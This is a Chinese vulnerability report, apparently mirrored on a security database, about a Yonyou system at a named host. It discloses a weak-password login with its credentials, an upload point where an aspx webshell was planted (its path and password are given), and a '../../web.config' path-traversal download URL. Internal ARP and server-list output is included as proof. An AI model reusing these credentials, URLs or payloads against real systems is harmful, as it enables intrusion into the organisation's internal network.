|用友某系统漏洞打包可威胁内网 - VULHUB开源网络安全威胁库

用友某系统漏洞打包可威胁内网

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： getshell可威胁内网 ### 详细说明：目标地址：http://nczx.yonyou.com/SubModule/Login/index.aspx [<img src="https://images.seebug.org/upload/201510/161618194cfeb75abeabcb49a4cfbcfe808002da.jpg" alt="QQ截图20151016161934.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/161618194cfeb75abeabcb49a4cfbcfe808002da.jpg) 1#帐号弱口令帐号：liuni 密码：123456 登录系统后，发现功能还是蛮全的 [<img src="https://images.seebug.org/upload/201510/1621571765aa2ef0ef0db88379a3b441efdaeadf.jpg" alt="QQ截图20151016215821.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1621571765aa2ef0ef0db88379a3b441efdaeadf.jpg) [<img src="https://images.seebug.org/upload/201510/16215738733ed8610e3207d8f0f904c6c972bfb4.jpg" alt="QQ截图20151016215851.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16215738733ed8610e3207d8f0f904c6c972bfb4.jpg) 在项目绿色通道功能处，发现一个上传点 2#任意文件上传 [<img src="https://images.seebug.org/upload/201510/16220726bb8fe6404277c5459cf6f9073635b35d.jpg" alt="QQ截图20151016215944.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16220726bb8fe6404277c5459cf6f9073635b35d.jpg) ``` http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2 ``` 可直接上传aspx马 [<img src="https://images.seebug.org/upload/201510/16220927148afc6520466900fa424e55384bdf33.jpg" alt="QQ截图20151016221038.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/16220927148afc6520466900fa424e55384bdf33.jpg) 上传后的地址经测试发现在 ``` http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx ``` 密码：F4ck [<img src="https://images.seebug.org/upload/201510/162211297e219814ec49ba5f635a163537b19e57.jpg" alt="QQ截图20151016221219.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162211297e219814ec49ba5f635a163537b19e57.jpg) [<img src="https://images.seebug.org/upload/201510/162217077cae20a7e019f3c69da0e4fabf810e18.jpg" alt="QQ截图20151016221821.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162217077cae20a7e019f3c69da0e4fabf810e18.jpg) ``` 接口: 172.16.3.111 --- 0xa Internet 地址物理地址类型 172.16.3.1 c4-ca-d9-36-76-e7 动态 172.16.3.27 00-e0-81-de-0d-90 动态 172.16.3.32 00-1a-4d-20-db-60 动态 172.16.3.54 00-e0-81-b9-4e-00 动态 172.16.3.92 00-1a-4b-de-3d-64 动态 172.16.3.100 00-1b-78-76-d7-96 动态 172.16.3.102 00-1a-4b-de-d5-d4 动态 172.16.3.103 00-11-25-8d-1f-58 动态 172.16.3.104 00-19-21-64-30-ec 动态 172.16.3.151 00-e0-81-d7-6d-6a 动态 172.16.3.155 00-e0-81-d1-ad-89 动态 172.16.3.189 00-e0-81-d0-0d-d9 动态 172.16.3.204 00-15-17-d4-07-fd 动态 172.16.3.255 ff-ff-ff-ff-ff-ff 静态 224.0.0.22 01-00-5e-00-00-16 静态 224.0.0.251 01-00-5e-00-00-fb 静态 224.0.0.252 01-00-5e-00-00-fc 静态 224.0.1.24 01-00-5e-00-01-18 静态 229.111.112.12 01-00-5e-6f-70-0c 静态 232.44.44.233 01-00-5e-2c-2c-e9 静态 239.5.5.5 01-00-5e-05-05-05 静态 239.255.255.250 01-00-5e-7f-ff-fa 静态 255.255.255.255 ff-ff-ff-ff-ff-ff 静态 ``` 可内网 [<img src="https://images.seebug.org/upload/201510/1622182596f9f30d0123fdd700242b98153dd562.jpg" alt="QQ截图20151016221922.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1622182596f9f30d0123fdd700242b98153dd562.jpg) ### 漏洞证明： ``` 服务器名称注解-------------------------------------------------------------------------------\\CYLSERVER \\NC-RM \\NCSCMSERVER1 \\R520156 \\U8DBSERVER0 \\U8DRP2008 \\U8JC40 \\U8MANAGESERVER \\U8PATCHSRV \\U8PATCHSRV2 \\UF200703040 \\UF201103043 uf201103043 \\UF201103061 命令成功完成。 ``` [<img src="https://images.seebug.org/upload/201510/162219076a4159fc0e0040f834dd8e7e39dc71d9.jpg" alt="QQ截图20151016222004.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162219076a4159fc0e0040f834dd8e7e39dc71d9.jpg) 3#任意文件下载（需要登录） ``` http://nczx.yonyou.com/SubModule/ProjectManage/Document/Download.aspx?destFileName=../../web.config ``` [<img src="https://images.seebug.org/upload/201510/162222140ff51253314b8a9d5ef620a49849a017.jpg" alt="QQ截图20151016222257.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/162222140ff51253314b8a9d5ef620a49849a017.jpg) [<img src="https://images.seebug.org/upload/201510/1622220240149646a74c3ee7014929caf1c00723.jpg" alt="QQ截图20151016222314.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1622220240149646a74c3ee7014929caf1c00723.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™